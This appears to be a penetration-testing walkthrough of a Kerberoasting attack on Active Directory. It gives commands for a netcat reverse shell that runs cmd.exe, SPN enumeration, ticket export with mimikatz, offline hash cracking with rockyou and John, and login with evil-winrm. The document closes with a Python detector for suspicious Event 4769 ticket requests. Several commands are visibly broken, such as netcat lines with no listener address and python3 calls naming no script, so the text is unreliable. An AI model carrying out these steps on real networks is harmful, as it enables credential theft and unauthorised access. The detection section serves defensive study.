Service Account Attacks (Example Path)

  1. Make sure you have a stable shell. This ensures we can run mimikatz on the machine.

Transfer the nc file, execute the following, and have nc listening on Kali.

PS C:\Windows\Temp> C:\Windows\Temp\nc.exe 443 -e cmd.exe (powershell.exe)
C:\Inetpub\Scripts\nc.exe 443 -e cmd.exe 

2. Go through the enumeration methods and see if there are any service accounts.

  • An SPN is a unique name for a service on a host, used to associate the service with an Active Directory service account.

  • Enumerate SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.

  • Query the Domain Controller in search of SPNs.

  • SPN Examples

    • CIFS/MYCOMPUTER$ - file share access.

    • LDAP/MYCOMPUTER$ - querying AD info via LDAP.

    • HTTP/MYCOMPUTER$ - Web services such as IIS.


  • Perform nslookup of the service hostname -> see if there is an entrypoint here.

  • Automated SPN enum scripts:

# Kerberoast:
PS> .\GetUserSPNs.ps1

# Powershell Empire:
PS> .\Get-SPN.ps1

Take note of the account name you found!

3. Transfer mimikatz.exe to the host and run it. (Sometimes the mimikatz version matters; try 2.2.0 if one doesn't work.)

4. Use the SPN to dump the Kerberos tickets

  • If we know the serviceprincipalname value from prior AD enum, we can target the SPN by requesting a service ticket for it from the Domain Controller and access resources from the service with our own ticket.

# request service ticket
PS> Add-Type -AssemblyName System.IdentityModel
PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '[service_principal_name]'

# export cached tickets
mimikatz > kerberos::list /export

It's important to take note of the "SAMAccountName", which we will use as the username at the next stage when we try to log in to the account via evil-winrm.

Crack SPN hashes

# Kerberoast
$ python3 rockyou.txt [ticket.kirbi]  # locally crack hashes
PS> Invoke-Kerberoast.ps1                            # crack hashes on target

# John the Ripper
Move the ticket to the master directory where the scripts live (mv /home/kali/transfer/AD/ticket.kirbi /home/kali/transfer/Downloads/kerberoast-master/)
$ python3 -o johncrackfile ticket.kirbi  # convert ticket to john file
$ john --wordlist=rockyou.txt johncrackfile

After cracking the hashes, you can run

./evil-winrm.rb -i -u sqlServer -p PASS
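
From the defender's side, the service-ticket requests made in the ticket-dumping step are recorded on the Domain Controller as Security Event ID 4769. The following is an added example, not part of the original notes: it flags accounts that request RC4-encrypted (0x17) tickets for several distinct service accounts within a short window. The flattened key=value log format, the sample records, the function names and the thresholds are assumptions made for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType logged for RC4-HMAC service tickets

# Constructed sample records (not real logs), one flattened 4769 event per line.
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=sqlServer TicketEncryptionType=0x17 Status=0x0",
    "2024-05-01T10:00:03 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0",
    "2024-05-01T10:00:04 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0",
    "2024-05-01T10:01:00 EventID=4769 TargetUserName=asmith@CORP.LOCAL ServiceName=sqlServer TicketEncryptionType=0x12 Status=0x0",
    "2024-05-01T10:02:00 EventID=4769 TargetUserName=WS01$@CORP.LOCAL ServiceName=FILESRV$ TicketEncryptionType=0x17 Status=0x0",
    "2024-05-01T10:03:00 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=sqlServer TicketEncryptionType=0x17 Status=0x0",
    "2024-05-01T08:00:00 EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0",
    "2024-05-01T11:00:00 EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0",
    "2024-05-01T14:00:00 EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=sqlServer TicketEncryptionType=0x17 Status=0x0",
]

def parse(line):
    """Turn one flattened record into a dict with a datetime under 'time'."""
    ts, *pairs = line.split()
    ev = dict(p.split("=", 1) for p in pairs)
    ev["time"] = datetime.fromisoformat(ts)
    return ev

def is_suspect(ev):
    """Successful RC4 ticket request by a user account for a user-backed service."""
    svc = ev["ServiceName"]
    return (ev["EventID"] == "4769" and ev["Status"] == "0x0"
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and svc.lower() != "krbtgt" and not svc.endswith("$")
            and not ev["TargetUserName"].split("@")[0].endswith("$"))

def find_kerberoast_candidates(lines, min_services=3, window=timedelta(minutes=5)):
    """Return {account: sorted services} for accounts that requested RC4 tickets
    for at least min_services distinct services inside one time window."""
    per_account = defaultdict(list)
    for ev in sorted(map(parse, lines), key=lambda e: e["time"]):
        if is_suspect(ev):
            per_account[ev["TargetUserName"]].append((ev["time"], ev["ServiceName"]))
    alerts = {}
    for account, hits in per_account.items():
        for i, (start, _) in enumerate(hits):
            services = {s for t, s in hits[i:] if t - start <= window}
            if len(services) >= min_services:
                alerts[account] = sorted(services)
                break
    return alerts
```

Event 4769 is only written when the "Audit Kerberos Service Ticket Operations" audit subcategory is enabled on the Domain Controllers. Tune `min_services` and `window` against normal traffic before alerting on the result.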
